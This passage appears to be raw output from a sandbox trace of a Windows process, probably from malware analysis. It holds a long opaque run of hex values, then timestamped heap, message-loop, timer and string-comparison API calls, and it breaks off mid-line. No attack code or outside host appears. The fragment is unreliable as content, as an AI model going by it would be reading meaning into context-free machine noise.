x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0242.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0242.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0242.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0242.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0242.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0242.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0242.676] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0242.676] TranslateMessage (lpMsg=0x8bf970) returned 0 [0242.676] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0242.676] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0242.676] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0242.676] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0242.676] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.676] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0242.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0242.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0242.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0242.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0242.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0242.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0242.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0242.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0242.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0242.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="History", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="istory", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0242.677] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="story", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0242.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0242.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0242.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.677] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0242.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0242.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0242.678] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0242.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0242.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0242.678] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0242.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0242.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0242.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0242.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0242.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="History", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0242.679] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="istory", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0242.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0242.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0242.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0242.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0242.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0242.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0242.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0242.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0242.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0242.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0242.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0242.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0242.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0242.680] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0242.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0242.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 